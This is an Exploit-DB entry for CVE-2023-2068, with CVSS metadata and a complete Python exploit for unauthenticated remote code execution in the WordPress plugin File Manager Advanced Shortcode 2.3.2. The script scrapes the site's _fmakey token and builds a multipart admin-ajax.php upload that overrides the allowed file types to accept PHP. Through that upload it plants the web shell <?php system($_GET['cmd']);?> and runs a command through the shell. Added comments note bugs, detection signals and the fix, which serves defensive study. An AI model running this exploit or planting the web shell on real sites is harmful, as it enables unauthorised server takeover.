exploitdb — Mateus Machado Tesser — EDB-ID: 51505
History: Jun 04, 2023 - 12:00 a.m.

File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)

2023-06-04 00:00:00
Mateus Machado Tesser
www.exploit-db.com
exploit
remote code execution
wordpress
linux
unauthenticated
security vulnerability
ajax
file manager

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

0.284 Low

EPSS

Percentile

96.9%

# Exploit Title: File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)
# Date: 05/31/2023
# Exploit Author: Mateus Machado Tesser
# Vendor Homepage: https://advancedfilemanager.com/
# Version: File Manager Advanced Shortcode 2.3.2
# Tested on: Wordpress 6.1 / Linux (Ubuntu) 5.15
# CVE: CVE-2023-2068

import requests
import json
import pprint
import sys
import re

# ANSI colour prefixes for console status lines: blue "[*]" marks progress,
# green "[+]" success and red "[-]" failure; "\033[0m" resets the attributes.
PROCESS = "\033[1;34;40m[*]\033[0m"
SUCCESS = "\033[1;32;40m[+]\033[0m"
FAIL = "\033[1;31;40m[-]\033[0m"

# Positional arguments: argv[1] is the target host, argv[2] the command string.
# NOTE(review): the two `if ... pass` branches never act on their condition and
# the bare `except: pass` swallows the IndexError raised when an argument is
# missing, so IP and/or COMMAND can be left unbound and the script continues
# until a later NameError. The usage line is only printed when argv[1] is an
# empty string.
try:
	COMMAND = sys.argv[2]
	IP = sys.argv[1]
	if len(COMMAND) > 1:
		pass
	if IP:
		pass
	else:
		print(f'Use: {sys.argv[0]} IP COMMAND')
except:
	pass

url = 'http://'+IP+'/' # Base URL of the WordPress site hosting the File Manager Advanced Shortcode panel
print(f"{PROCESS} Searching fmakey")

# The `_fmakey` value is scraped from the site's front page: the first line
# containing `_fmakey` is taken and the text between its first pair of single
# quotes becomes the key. The request is unauthenticated, so the script relies
# on that key being present in HTML served to anonymous visitors; it is the
# only token the AJAX request below carries. Exposure of this value in public
# page source is therefore part of what makes the issue reachable pre-auth.
# NOTE(review): `re.findall(...)[0]` raises IndexError when there is no match
# and `.split("'")[1]` raises when the matched line has no quotes; both land in
# the bare `except`, which only prints and lets the script continue with
# `fmakey` unbound (a NameError follows later). `requests.get` is called
# without a timeout, so an unresponsive host blocks indefinitely.
try:
	r = requests.get(url)
	raw_fmakey = r.text
	fmakey = re.findall('_fmakey.*$',raw_fmakey,re.MULTILINE)[0].split("'")[1]
	if len(fmakey) == 0:
		print(f"{FAIL} Cannot found fmakey!")
except:
	print(f"{FAIL} Cannot found fmakey!")

print(f'{PROCESS} Exploiting Unauthenticated Remote Code Execution via AJAX!')
# Target endpoint is the standard WordPress AJAX dispatcher; the plugin's
# handler is selected by the `action` form field below.
url = "http://"+IP+"/wp-admin/admin-ajax.php"
# The multipart body is assembled by hand with a fixed boundary string (the
# same one is declared in the Content-Type header).
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryI52DGCOt37rixRS1", "Accept": "*/*"}
data = "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n\r\n"
# elFinder-style connector command: `cmd=upload` against target `l1_Lw`
# (presumably an encoded root-directory hash - verify against the plugin).
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hashes[l1_cG5nLWNsaXBhcnQtaGFja2VyLWhhY2tlci5wbmc]\"\r\n\r\nexploit.php\r\n"
# Detection: `action=fma_load_shortcode_fma_ui` sent to admin-ajax.php from an
# unauthenticated session, combined with `cmd=upload`, is the primary
# request-level indicator for this issue.
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_shortcode_fma_ui\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"_fmakey\"\r\n\r\n"+fmakey+"\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path\"\r\n\r\n\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"url\"\r\n\r\n\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"w\"\r\n\r\nfalse\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"r\"\r\n\r\ntrue\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide\"\r\n\r\nplugins\r\n"
# The request carries its own file-manager configuration (operations,
# path_type, upload_allow, upload_max_size). The core weakness this script
# depends on is that these shortcode-style settings are accepted from the
# client: `upload_allow=text/x-php` and `upload_max_size=2G` are what let a
# PHP file through. A fixed handler must take that policy from server-side
# configuration and enforce a capability check, not read it from the POST.
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"operations\"\r\n\r\nupload,download\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path_type\"\r\n\r\ninside\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide_path\"\r\n\r\nno\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"enable_trash\"\r\n\r\nno\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_allow\"\r\n\r\ntext/x-php\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_max_size\"\r\n\r\n2G\r\n"
# The uploaded part is a minimal PHP web shell; a multipart file part with
# Content-Type text/x-php inside an admin-ajax.php request is a strong
# WAF / IDS signal, and the resulting .php file in the plugin's upload
# location is the on-disk artefact to hunt for during incident response.
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"exploit2.php\"\r\nContent-Type: text/x-php\r\n\r\n<?php system($_GET['cmd']);?>\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n\r\n------WebKitFormBoundaryI52DGCOt37rixRS1--\r\n"
r = requests.post(url, headers=headers, data=data)
print(f"{PROCESS} Sending AJAX request to: {url}")
# Outcome classification: `errUploadMime` in the body means the connector
# rejected the MIME type (i.e. the server did not honour the client-supplied
# upload_allow); a text/html response is treated as a key/handler problem;
# anything else is assumed to be the connector's JSON reply.
# NOTE(review): `r.headers['Content-Type']` raises KeyError if the header is
# absent, and `json.loads` below raises if the "success" body is not JSON.
if 'errUploadMime' in r.text:
	print(f'{FAIL} Exploit failed!')
	sys.exit()
elif r.headers['Content-Type'].startswith("text/html"):
	print(f'{FAIL} Exploit failed! Try to change _fmakey')
	sys.exit(0)
else:
	print(f'{SUCCESS} Exploit executed with success!')
exploited = json.loads(r.text)
url = ""
print(f'{PROCESS} Getting URL with webshell')
# The connector's reply lists uploaded entries under "added"; the loop keeps
# the `url` of the last one. A KeyError is raised if "added" is missing.
for i in exploited["added"]:
	url = i['url']
# Second-stage indicator: a GET to the newly created file with a `cmd` query
# parameter, followed by web-server process spawning a shell. Mitigation is to
# update the plugin past the affected version and remove any such file found.
print(f"{PROCESS} Executing '{COMMAND}'")
r = requests.get(url+'?cmd='+COMMAND)
print(f'{SUCCESS} The application returned ({len(r.text)} length):\n'+r.text)
